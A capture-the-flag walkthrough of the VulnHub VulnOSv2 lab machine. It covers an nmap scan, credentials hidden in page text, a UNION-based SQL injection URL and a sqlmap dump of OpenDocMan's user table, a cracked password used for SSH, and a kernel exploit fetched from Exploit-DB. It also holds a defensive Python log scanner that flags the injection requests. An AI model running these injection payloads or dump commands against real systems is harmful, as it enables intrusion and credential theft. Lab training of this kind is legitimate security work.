Download link — https://download.vulnhub.com/vulnos/VulnOSv2.7z
Nmap :- nmap -p- -sCV -A -v ip
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
| 2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
|_ 256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open irc ngircd
MAC Address: 08:00:27:F9:DD:0B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Uptime guess: 198.047 days (since Wed Nov 2 11:24:59 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Visiting the HTTP service, we got an index page with a hyperlink that redirects us to /jabc

At /jabc we found a Documentation menu. Clicking it showed some text written in black so that it won’t be visible to a normal user, but when we select the whole page (Ctrl+A) the text shows up, giving us the credentials and the login id

Now let’s visit the page with the provided creds (guest:guest)

After logging in we found an upload option, but it doesn’t seem to be very useful: even after bypassing the upload filter we don’t know where the files end up, so we can’t execute them. So let’s search for OpenDocMan v1.2.7. We found an exploit on Exploit-DB showing that OpenDocMan is vulnerable to SQL injection, so we can use it to dump the database with the help of sqlmap
So let’s confirm whether the SQL injection works
http://10.0.0.6/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9

Yup, it’s working, and now we can move on to sqlmap to enumerate in a better way
sqlmap -u "http://192.168.1.42/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump
Here I found the users’ creds. Now let’s crack the hash we found for webmin; the recovered password is ‘webmin1980’
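Seen from the defender's side, the injection request above stands out in the web server logs, because a normal add_value is just a bare table name. The following is an added example, not part of the original write-up or of OpenDocMan: it scans Apache access-log lines and flags ajax_udf.php requests whose decoded add_value is not a plain identifier. The log lines are constructed samples, and the regexes and the "bare table name" rule are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache common/combined log line: client ... "METHOD target PROTO" status
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Assumption: a legitimate add_value is a bare table name such as odm_user.
SAFE_VALUE_RE = re.compile(r'[A-Za-z0-9_]+')
# Keywords reported as context only; the identifier check above is the detector.
SQL_HINT_RE = re.compile(r'\b(union|select|from|sleep|benchmark|information_schema)\b', re.I)

# Constructed sample log lines (client addresses and sizes are made up).
SAMPLE_LOG = [
    '10.0.0.1 - - [03/Oct/2019:05:10:01 +0200] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user HTTP/1.1" 200 312',
    '10.0.0.5 - - [03/Oct/2019:05:11:42 +0200] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9 HTTP/1.1" 200 355',
    '10.0.0.1 - - [03/Oct/2019:05:12:09 +0200] "GET /jabcd0cs/index.php HTTP/1.1" 200 1024',
]

def check_line(line):
    """Return a finding dict for a suspicious ajax_udf.php request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/ajax_udf.php"):
        return None
    # parse_qs percent-decodes, so %20UNION%20SELECT is compared as " UNION SELECT".
    values = parse_qs(url.query, keep_blank_values=True).get("add_value", [])
    bad = [v for v in values if not SAFE_VALUE_RE.fullmatch(v)]
    if not bad:
        return None
    return {
        "client": m.group("ip"),
        "status": int(m.group("status")),
        "add_value": bad[0],
        "sql_keywords": sorted({k.lower() for k in SQL_HINT_RE.findall(bad[0])}),
    }

def scan(lines):
    """Run check_line over every log line and keep only the findings."""
    return [f for f in map(check_line, lines) if f is not None]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same "identifier only" rule, applied server-side as an allowlist of permitted table names before the query is built, is what closes this class of injection.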
Logging in to ssh with webmin creds
└──╼ #ssh webmin@10.0.0.16
webmin@10.0.0.16’s password:
Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)
* Documentation: https://help.ubuntu.com/
System information as of Thu Oct 3 05:16:49 CEST 2019
System load: 0.08 Memory usage: 4% Processes: 61
Usage of /: 5.4% of 29.91GB Swap usage: 0% Users logged in: 0
Graph this data and manage this system at:
https://landscape.canonical.com/
Last login: Wed Oct 2 06:24:15 2019 from 10.0.0.1
$ id
uid=1001(webmin) gid=1001(webmin) groups=1001(webmin)
$
While enumerating, we found the kernel to be vulnerable and found an exploit at “https://www.exploit-db.com/download/37292”, which we transferred with the help of a Python server
And exploited it

……………………………………EASY…..………………………………….